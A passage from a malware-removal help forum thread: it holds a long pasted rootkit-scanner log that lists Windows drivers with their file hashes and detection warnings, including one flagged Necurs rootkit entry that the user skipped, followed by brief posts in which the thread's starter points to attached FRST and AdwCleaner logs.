23:24:16.0040 0x18fc  volsnap ( LockedFile.Multi.Generic ) - warning
23:24:16.0040 0x18fc  Force sending object to P2P due to detect: volsnap
23:24:16.0040 0x18fc  Object send P2P result: false
23:24:16.0120 0x18fc  [ 5E2016EA6EBACA03C04FEAC5F330D997, 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC ] vsmraid         C:\Windows\system32\DRIVERS\vsmraid.sys
23:24:16.0120 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vsmraid.sys. md5: 5E2016EA6EBACA03C04FEAC5F330D997, sha256: 53106EB877459FE55A459111F7AB0EE320BB3B4C954D3DB6FA1642396001F2AC
23:24:16.0120 0x18fc  vsmraid - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0120 0x18fc  Object is SCO, delete is not allowed
23:24:16.0120 0x18fc  vsmraid ( LockedFile.Multi.Generic ) - warning
23:24:16.0120 0x18fc  Force sending object to P2P due to detect: vsmraid
23:24:16.0120 0x18fc  Object send P2P result: false
23:24:16.0370 0x18fc  [ 787898BF9FB6D7BD87A36E2D95C899BA, A6C0C7402B1A198E7B3D6D7D283FCB5815AC429DA68FC9B54C67707F3233CCB5 ] VSS             C:\Windows\system32\vssvc.exe
23:24:16.0522 0x18fc  VSS - ok
23:24:16.0542 0x18fc  [ 36D4720B72B5C5D9CB2B9C29E9DF67A1, 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7 ] vwifibus        C:\Windows\system32\DRIVERS\vwifibus.sys
23:24:16.0552 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vwifibus.sys. md5: 36D4720B72B5C5D9CB2B9C29E9DF67A1, sha256: 3254523C85C70EBA2DBAC05DB2DBA89EDF8E9195F390F7C21F96458FB6B2E3D7
23:24:16.0552 0x18fc  vwifibus - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0552 0x18fc  vwifibus ( LockedFile.Multi.Generic ) - warning
23:24:16.0552 0x18fc  Force sending object to P2P due to detect: vwifibus
23:24:16.0552 0x18fc  Object send P2P result: false
23:24:16.0562 0x18fc  [ 6A3D66263414FF0D6FA754C646612F3F, 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB ] vwififlt        C:\Windows\system32\DRIVERS\vwififlt.sys
23:24:16.0562 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\vwififlt.sys. md5: 6A3D66263414FF0D6FA754C646612F3F, sha256: 30F6BA594B0D3B94113064015A16D97811CD989DF1715CCE21CEAB9894C1B4FB
23:24:16.0562 0x18fc  vwififlt - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0562 0x18fc  vwififlt ( LockedFile.Multi.Generic ) - warning
23:24:16.0562 0x18fc  Force sending object to P2P due to detect: vwififlt
23:24:16.0562 0x18fc  Object send P2P result: false
23:24:16.0602 0x18fc  [ 1C9D80CC3849B3788048078C26486E1A, 34A89F31E53F6B6C209B286F580CC2257AE6D057E4E20741F241C9C167947962 ] W32Time         C:\Windows\system32\w32time.dll
23:24:16.0712 0x18fc  W32Time - ok
23:24:16.0742 0x18fc  [ 4E9440F4F152A7B944CB1663D3935A3E, 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53 ] WacomPen        C:\Windows\system32\DRIVERS\wacompen.sys
23:24:16.0742 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wacompen.sys. md5: 4E9440F4F152A7B944CB1663D3935A3E, sha256: 8FE04EBD3BC612EE943A21A3E56F37E5C9B578CDACA6044048181DAD81816D53
23:24:16.0742 0x18fc  WacomPen - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0742 0x18fc  Object is SCO, delete is not allowed
23:24:16.0742 0x18fc  WacomPen ( LockedFile.Multi.Generic ) - warning
23:24:16.0742 0x18fc  Force sending object to P2P due to detect: WacomPen
23:24:16.0742 0x18fc  Object send P2P result: false
23:24:16.0762 0x18fc  [ 47CA49400643EFFD3F1C9A27E1D69324, 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
23:24:16.0762 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wanarp.sys. md5: 47CA49400643EFFD3F1C9A27E1D69324, sha256: 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0
23:24:16.0762 0x18fc  WANARP - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0762 0x18fc  Object is SCO, delete is not allowed
23:24:16.0762 0x18fc  WANARP ( LockedFile.Multi.Generic ) - warning
23:24:16.0762 0x18fc  Force sending object to P2P due to detect: WANARP
23:24:16.0762 0x18fc  Object send P2P result: false
23:24:16.0762 0x18fc  [ 47CA49400643EFFD3F1C9A27E1D69324, 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
23:24:16.0772 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wanarp.sys. md5: 47CA49400643EFFD3F1C9A27E1D69324, sha256: 7EFD3405282264F7987172B226882FCDD223F771959B9CEBEBF9ECEA317D85B0
23:24:16.0772 0x18fc  Wanarpv6 - detected LockedFile.Multi.Generic ( 1 )
23:24:16.0772 0x18fc  Object is SCO, delete is not allowed
23:24:16.0772 0x18fc  Wanarpv6 ( LockedFile.Multi.Generic ) - warning
23:24:16.0892 0x18fc  [ 5AB1BB85BD8B5089CC5D64200DEDAE68, 28777D4F3CD07C8E3465B6DA0FCA994E0B93071A3A0D4D1D64C1DF633DD1C64F ] wbengine        C:\Windows\system32\wbengine.exe
23:24:17.0032 0x18fc  wbengine - ok
23:24:17.0062 0x18fc  [ 3AA101E8EDAB2DB4131333F4325C76A3, 4F7BD3DA5E58B18BFF106CFF7B45E75FD13EE556D433C695BA23EC80827E49DE ] WbioSrvc        C:\Windows\System32\wbiosrvc.dll
23:24:17.0082 0x18fc  WbioSrvc - ok
23:24:17.0102 0x18fc  [ 8321C2CA3B62B61B293CDA3451984468, 856A079C2CCC75D633EA23E410D7F3ECDF368EAAAFF634CB82DDA545FD3A2F9C ] wcncsvc         C:\Windows\System32\wcncsvc.dll
23:24:17.0152 0x18fc  wcncsvc - ok
23:24:17.0172 0x18fc  [ 20F7441334B18CEE52027661DF4A6129, 7B8E0247234B740FED2BE9B833E9CE8DD7453340123AB43F6B495A7E6A27B0DD ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll
23:24:17.0232 0x18fc  WcsPlugInService - ok
23:24:17.0252 0x18fc  [ 72889E16FF12BA0F235467D6091B17DC, F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8 ] Wd              C:\Windows\system32\DRIVERS\wd.sys
23:24:17.0252 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wd.sys. md5: 72889E16FF12BA0F235467D6091B17DC, sha256: F2FD0BBD075E33608D93F350D216F97442AB89ABD540513C2D568C78096E12A8
23:24:17.0252 0x18fc  Wd - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0252 0x18fc  Object is SCO, delete is not allowed
23:24:17.0252 0x18fc  Wd ( LockedFile.Multi.Generic ) - warning
23:24:17.0302 0x18fc  [ 441BD2D7B4F98134C3A4F9FA570FD250, FF20815273014C5A27C2B75E2C70FE674809293627056199F502DFDF4CECFCA1 ] Wdf01000        C:\Windows\system32\drivers\Wdf01000.sys
23:24:17.0302 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Wdf01000.sys. md5: 441BD2D7B4F98134C3A4F9FA570FD250, sha256: FF20815273014C5A27C2B75E2C70FE674809293627056199F502DFDF4CECFCA1
23:24:17.0312 0x18fc  Wdf01000 - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0312 0x18fc  Object is SCO, delete is not allowed
23:24:17.0312 0x18fc  Wdf01000 ( LockedFile.Multi.Generic ) - warning
23:24:17.0312 0x18fc  Force sending object to P2P due to detect: Wdf01000
23:24:17.0312 0x18fc  Object send P2P result: false
23:24:17.0352 0x18fc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiServiceHost  C:\Windows\system32\wdi.dll
23:24:17.0372 0x18fc  WdiServiceHost - ok
23:24:17.0382 0x18fc  [ BF1FC3F79B863C914687A737C2F3D681, B2DF47AC4931ACFB243775767B77065CC0D98778FC0243C793A3E219EB961209 ] WdiSystemHost   C:\Windows\system32\wdi.dll
23:24:17.0402 0x18fc  WdiSystemHost - ok
23:24:17.0442 0x18fc  [ 8A438CBB8C032A0C798B0C642FFBE572, 3200B9B6A7B87C1C47295FA416C99DE1FBB2DBBA3DA78D5CC88C26DCC4189D45 ] WebClient       C:\Windows\System32\webclnt.dll
23:24:17.0492 0x18fc  WebClient - ok
23:24:17.0522 0x18fc  [ C749025A679C5103E575E3B48E092C43, B71171D07EE7AB085A24BF3A1072FF2CE7EA021AAE695F6A90640E6EE8EB55C1 ] Wecsvc          C:\Windows\system32\wecsvc.dll
23:24:17.0582 0x18fc  Wecsvc - ok
23:24:17.0614 0x18fc  [ 7E591867422DC788B9E5BD337A669A08, 484E6BCCDF7ADCE9A1AACAD1BC7C7D7694B9E40FA90D94B14D80C607784F6C75 ] wercplsupport   C:\Windows\System32\wercplsupport.dll
23:24:17.0644 0x18fc  wercplsupport - ok
23:24:17.0674 0x18fc  [ 6D137963730144698CBD10F202E9F251, A9F522A125158D94F540544CCD4DBF47B9DCE2EA878C33675AFE40F80E8F4979 ] WerSvc          C:\Windows\System32\WerSvc.dll
23:24:17.0704 0x18fc  WerSvc - ok
23:24:17.0764 0x18fc  [ 611B23304BF067451A9FDEE01FBDD725, 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8 ] WfpLwf          C:\Windows\system32\DRIVERS\wfplwf.sys
23:24:17.0764 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wfplwf.sys. md5: 611B23304BF067451A9FDEE01FBDD725, sha256: 0AF2734B978165FC6FD22B64862132CCE32528A21C698A49D176129446E099C8
23:24:17.0764 0x18fc  WfpLwf - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0764 0x18fc  WfpLwf ( LockedFile.Multi.Generic ) - warning
23:24:17.0784 0x18fc  [ 05ECAEC3E4529A7153B3136CEB49F0EC, 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50 ] WIMMount        C:\Windows\system32\drivers\wimmount.sys
23:24:17.0784 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\wimmount.sys. md5: 05ECAEC3E4529A7153B3136CEB49F0EC, sha256: 9995CB2CEC70A633EA33CBB0DEAD2BB28CB67132B41E9444BDAB9E75744C9A50
23:24:17.0784 0x18fc  WIMMount - detected LockedFile.Multi.Generic ( 1 )
23:24:17.0784 0x18fc  WIMMount ( LockedFile.Multi.Generic ) - warning
23:24:17.0784 0x18fc  Force sending object to P2P due to detect: WIMMount
23:24:17.0784 0x18fc  Object send P2P result: false
23:24:17.0794 0x18fc  WinDefend - ok
23:24:17.0804 0x18fc  WinHttpAutoProxySvc - ok
23:24:18.0054 0x18fc  [ 19B07E7E8915D701225DA41CB3877306, D6555E8D276DBB11358246E0FE215F76F1FB358791C76B88D82C2A66A42DA19F ] Winmgmt         C:\Windows\system32\wbem\WMIsvc.dll
23:24:18.0092 0x18fc  Winmgmt - ok
23:24:18.0366 0x18fc  [ 41FBB751936B387F9179E7F03A74FE29, 7A73D887BEC19DFC485ED42B4E6ABEBF824555139B81EA30731A00773E707464 ] WinRM           C:\Windows\system32\WsmSvc.dll
23:24:18.0526 0x18fc  WinRM - ok
23:24:18.0586 0x18fc  [ 817EAFF5D38674EDD7713B9DFB8E9791, F6E0BFC503BA7395F92989C11B454D1F1E58E29302BA203801449A2C5236E84D ] WinUsb          C:\Windows\system32\DRIVERS\WinUsb.sys
23:24:18.0586 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\WinUsb.sys. md5: 817EAFF5D38674EDD7713B9DFB8E9791, sha256: F6E0BFC503BA7395F92989C11B454D1F1E58E29302BA203801449A2C5236E84D
23:24:18.0596 0x18fc  WinUsb - detected LockedFile.Multi.Generic ( 1 )
23:24:18.0596 0x18fc  WinUsb ( LockedFile.Multi.Generic ) - warning
23:24:18.0596 0x18fc  Force sending object to P2P due to detect: WinUsb
23:24:18.0596 0x18fc  Object send P2P result: false
23:24:18.0716 0x18fc  [ 4FADA86E62F18A1B2F42BA18AE24E6AA, CE1683386886BF34862681A46199EA7E7FB4232A186047DA7FBD8EC240AF6726 ] Wlansvc         C:\Windows\System32\wlansvc.dll
23:24:18.0764 0x18fc  Wlansvc - ok
23:24:19.0188 0x18fc  [ 357CABBF155AFD1D3926E62539D2A3A7, C43CFF84E7D930B4999DC061AB0766B57AAD7540B3E6EE54605B10ECE90825F5 ] wlidsvc         C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
23:24:19.0248 0x18fc  wlidsvc - ok
23:24:19.0308 0x18fc  [ F6FF8944478594D0E414D3F048F0D778, 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9 ] WmiAcpi         C:\Windows\system32\DRIVERS\wmiacpi.sys
23:24:19.0308 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\wmiacpi.sys. md5: F6FF8944478594D0E414D3F048F0D778, sha256: 6F75E0AE6127B33A92A88E59D4B048FD4C15F997807BE7BF0EFE76F95235B1D9
23:24:19.0308 0x18fc  WmiAcpi - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0308 0x18fc  Object is SCO, delete is not allowed
23:24:19.0308 0x18fc  WmiAcpi ( LockedFile.Multi.Generic ) - warning
23:24:19.0308 0x18fc  Force sending object to P2P due to detect: WmiAcpi
23:24:19.0308 0x18fc  Object send P2P result: false
23:24:19.0418 0x18fc  [ 38B84C94C5A8AF291ADFEA478AE54F93, 1AC267AC73670BEA5F3785C9AD9DB146F8E993A862C843742B21FDB90D102B2A ] wmiApSrv        C:\Windows\system32\wbem\WmiApSrv.exe
23:24:19.0448 0x18fc  wmiApSrv - ok
23:24:19.0508 0x18fc  WMPNetworkSvc - ok
23:24:19.0538 0x18fc  [ 96C6E7100D724C69FCF9E7BF590D1DCA, 2E63C9B0893B4FC03B7A71BAEA6202D3D3DB1B52F3643467829B5A573FD7655B ] WPCSvc          C:\Windows\System32\wpcsvc.dll
23:24:19.0566 0x18fc  WPCSvc - ok
23:24:19.0580 0x18fc  [ 2E57DDF2880A7E52E76F41C7E96D327B, D24E19B6091C197D77D71BC044CE2E5A57BE0A2F00D1BB0732E380A398230E63 ] WPDBusEnum      C:\Windows\system32\wpdbusenum.dll
23:24:19.0610 0x18fc  WPDBusEnum - ok
23:24:19.0630 0x18fc  [ 6BCC1D7D2FD2453957C5479A32364E52, E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090 ] ws2ifsl         C:\Windows\system32\drivers\ws2ifsl.sys
23:24:19.0630 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\ws2ifsl.sys. md5: 6BCC1D7D2FD2453957C5479A32364E52, sha256: E48554D31FBDCF8F985C1C72524CAA9106F5B7CC2B79064F8F5E2562D517F090
23:24:19.0630 0x18fc  ws2ifsl - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0630 0x18fc  Object is SCO, delete is not allowed
23:24:19.0630 0x18fc  ws2ifsl ( LockedFile.Multi.Generic ) - warning
23:24:19.0640 0x18fc  [ E8B1FE6669397D1772D8196DF0E57A9E, 39FE0819360719F756BD31A1884A0508A1E2371ACC723E25E005CBEC0A7B02FA ] wscsvc          C:\Windows\System32\wscsvc.dll
23:24:19.0683 0x18fc  wscsvc - ok
23:24:19.0687 0x18fc  WSearch - ok
23:24:19.0742 0x18fc  [ D487F57B9E1A7C4C8EC9C53785064E8D, DE9F87DB5F99CDD300AB81FD067C54CD728885D79BF7282EB8CA70AB191278D6 ] wStLib64        C:\Windows\system32\drivers\wStLib64.sys
23:24:19.0742 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\wStLib64.sys. md5: D487F57B9E1A7C4C8EC9C53785064E8D, sha256: DE9F87DB5F99CDD300AB81FD067C54CD728885D79BF7282EB8CA70AB191278D6
23:24:19.0742 0x18fc  wStLib64 - detected LockedFile.Multi.Generic ( 1 )
23:24:19.0742 0x18fc  wStLib64 ( LockedFile.Multi.Generic ) - warning
23:24:19.0842 0x18fc  [ 38340204A2D0228F1E87740FC5E554A7, 57181ED34E73DD17B590803C770A086C57754F229C6F587637B8FBB5D6519603 ] wuauserv        C:\Windows\system32\wuaueng.dll
23:24:20.0006 0x18fc  wuauserv - ok
23:24:20.0026 0x18fc  [ 7CADC74271DD6461C452C271B30BD378, D58C2094C36FC665C03A6A269EED80DC71F330C3DCF40A27A3C8F56AB7A96861 ] WudfPf          C:\Windows\system32\drivers\WudfPf.sys
23:24:20.0026 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\WudfPf.sys. md5: 7CADC74271DD6461C452C271B30BD378, sha256: D58C2094C36FC665C03A6A269EED80DC71F330C3DCF40A27A3C8F56AB7A96861
23:24:20.0026 0x18fc  WudfPf - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0026 0x18fc  Object is SCO, delete is not allowed
23:24:20.0026 0x18fc  WudfPf ( LockedFile.Multi.Generic ) - warning
23:24:20.0086 0x18fc  [ 3B197AF0FFF08AA66B6B2241CA538D64, BC94E5EFF38B9C6A37717B2A6CA56679781A4872A0C4298056E074033571BE79 ] WUDFRd          C:\Windows\system32\DRIVERS\WUDFRd.sys
23:24:20.0086 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\WUDFRd.sys. md5: 3B197AF0FFF08AA66B6B2241CA538D64, sha256: BC94E5EFF38B9C6A37717B2A6CA56679781A4872A0C4298056E074033571BE79
23:24:20.0086 0x18fc  WUDFRd - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0086 0x18fc  Object is SCO, delete is not allowed
23:24:20.0086 0x18fc  WUDFRd ( LockedFile.Multi.Generic ) - warning
23:24:20.0116 0x18fc  [ B551D6637AA0E132C18AC6E504F7B79B, FA6495533A14E01ABB0F6689AB7503B1B439D3ADA7457DFCB7D81714A9817327 ] wudfsvc         C:\Windows\System32\WUDFSvc.dll
23:24:20.0166 0x18fc  wudfsvc - ok
23:24:20.0186 0x18fc  [ 9A3452B3C2A46C073166C5CF49FAD1AE, D6F95F51D8E37BA4CF403965EC08CCFEEA9EEFDBFC7752432EAEC19925BDA115 ] WwanSvc         C:\Windows\System32\wwansvc.dll
23:24:20.0236 0x18fc  WwanSvc - ok
23:24:20.0306 0x18fc  [ 2EE48CFCE7CA8E0DB4C44C7476C0943B, 2C324592F3F2D50BABA7123B6F9FC922667CC132777E019FF615F2D6F273A45E ] xusb21          C:\Windows\system32\DRIVERS\xusb21.sys
23:24:20.0306 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\xusb21.sys. md5: 2EE48CFCE7CA8E0DB4C44C7476C0943B, sha256: 2C324592F3F2D50BABA7123B6F9FC922667CC132777E019FF615F2D6F273A45E
23:24:20.0306 0x18fc  xusb21 - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0306 0x18fc  xusb21 ( LockedFile.Multi.Generic ) - warning
23:24:20.0366 0x18fc  [ 99217BD11BEE7F21E873F6E39B93AAFD, CF933ED9EEB02427BCAC02CDE32AE01D86D4D535BAC7E2EA473B04C2FDCCCBC9 ] ZSMC301b        C:\Windows\system32\Drivers\usbVM31b.sys
23:24:20.0366 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\Drivers\usbVM31b.sys. md5: 99217BD11BEE7F21E873F6E39B93AAFD, sha256: CF933ED9EEB02427BCAC02CDE32AE01D86D4D535BAC7E2EA473B04C2FDCCCBC9
23:24:20.0366 0x18fc  ZSMC301b - detected LockedFile.Multi.Generic ( 1 )
23:24:20.0366 0x18fc  ZSMC301b ( LockedFile.Multi.Generic ) - warning
23:24:20.0366 0x18fc  Force sending object to P2P due to detect: ZSMC301b
23:24:20.0366 0x18fc  Object send P2P result: false
23:24:20.0396 0x18fc  ================ Scan global ===============================
23:24:20.0416 0x18fc  [ BA0CD8C393E8C9F83354106093832C7B, 18D8A4780A2BAA6CEF7FBBBDA0EF6BF2DADF146E1E578A618DD5859E8ADBF1A8 ] C:\Windows\system32\basesrv.dll
23:24:20.0456 0x18fc  [ 457B44AB6D502E55F64A867D4F35C76C, 95FEC45E28DF394E778DA37719F7D579920531AD568E1C290B7F42CB03BEAA2C ] C:\Windows\system32\winsrv.dll
23:24:20.0476 0x18fc  [ 457B44AB6D502E55F64A867D4F35C76C, 95FEC45E28DF394E778DA37719F7D579920531AD568E1C290B7F42CB03BEAA2C ] C:\Windows\system32\winsrv.dll
23:24:20.0496 0x18fc  [ D6160F9D869BA3AF0B787F971DB56368, 0033E6212DD8683E4EE611B290931FDB227B4795F0B17C309DC686C696790529 ] C:\Windows\system32\sxssrv.dll
23:24:30.0315 0x18fc  Win FW state via NFP2: enabled ( trusted )
23:24:30.0315 0x18fc  ============================================================
23:24:30.0315 0x18fc  Scan finished
23:24:30.0315 0x18fc  ============================================================
23:24:30.0335 0x18f4  Detected object count: 215
23:24:30.0335 0x18f4  Actual detected object count: 215
23:29:46.0551 0x18f4  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen ) - skipped by user
23:29:46.0841 0x18f4  8299bf85dcfa9606 ( Rootkit.Win32.Necurs.gen ) - User select action: Skip 
23:29:47.0727 0x18f4  UmPass ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0730 0x18f4  USBAAPL64 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0730 0x18f4  USBAAPL64 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0731 0x18f4  usbaudio ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0731 0x18f4  usbaudio ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0735 0x18f4  usbccgp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0735 0x18f4  usbccgp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0737 0x18f4  usbcir ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0737 0x18f4  usbcir ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbehci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbehci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbhub ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbhub ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbohci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbohci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  usbprint ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  usbprint ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0747 0x18f4  USBSTOR ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0747 0x18f4  USBSTOR ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  usbuhci ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  usbuhci ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  usbvideo ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  usbvideo ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0757 0x18f4  vdrvroot ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0757 0x18f4  vdrvroot ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0767 0x18f4  vga ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0767 0x18f4  vga ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0767 0x18f4  VgaSave ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0767 0x18f4  VgaSave ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  vhdmp ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  vhdmp ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  viaide ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  viaide ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  volmgr ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  volmgr ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0787 0x18f4  volmgrx ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0787 0x18f4  volmgrx ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0798 0x18f4  volsnap ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0798 0x18f4  volsnap ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0800 0x18f4  vsmraid ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0800 0x18f4  vsmraid ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0802 0x18f4  vwifibus ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0802 0x18f4  vwifibus ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0804 0x18f4  vwififlt ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0804 0x18f4  vwififlt ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0806 0x18f4  WacomPen ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0807 0x18f4  WacomPen ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0811 0x18f4  WANARP ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0811 0x18f4  WANARP ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0812 0x18f4  Wanarpv6 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0812 0x18f4  Wanarpv6 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0815 0x18f4  Wd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0815 0x18f4  Wd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0817 0x18f4  Wdf01000 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0817 0x18f4  Wdf01000 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WfpLwf ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WfpLwf ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WIMMount ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WIMMount ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WinUsb ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WinUsb ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  WmiAcpi ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  WmiAcpi ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0819 0x18f4  ws2ifsl ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0819 0x18f4  ws2ifsl ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  wStLib64 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  wStLib64 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  WudfPf ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  WudfPf ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  WUDFRd ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  WUDFRd ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0829 0x18f4  xusb21 ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0829 0x18f4  xusb21 ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  ZSMC301b ( LockedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  ZSMC301b ( LockedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  MusicManager ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  Hyperdesktop ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0839 0x18f4  Hyperdesktop ( UnsignedFile.Multi.Generic ) - User select action: Skip 
23:29:47.0839 0x18f4  SpybotPostWindows10UpgradeReInstall ( UnsignedFile.Multi.Generic ) - skipped by user
23:29:47.0849 0x18f4  SpybotPostWindows10UpgradeReInstall ( UnsignedFile.Multi.Generic ) - User select action: Skip 

  • 0

#5
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

Log from FRST fix

Attached Files


Edited by Joe Hunter, 28 March 2016 - 05:19 PM.

  • 0

#6
Joe Hunter

Joe Hunter

    New Member

  • Topic Starter
  • Member
  • Pip
  • 9 posts

The last log from ADW cleaner. Hope these help and again thanks.

Attached Files


  • 0

#7
Essexboy

Essexboy

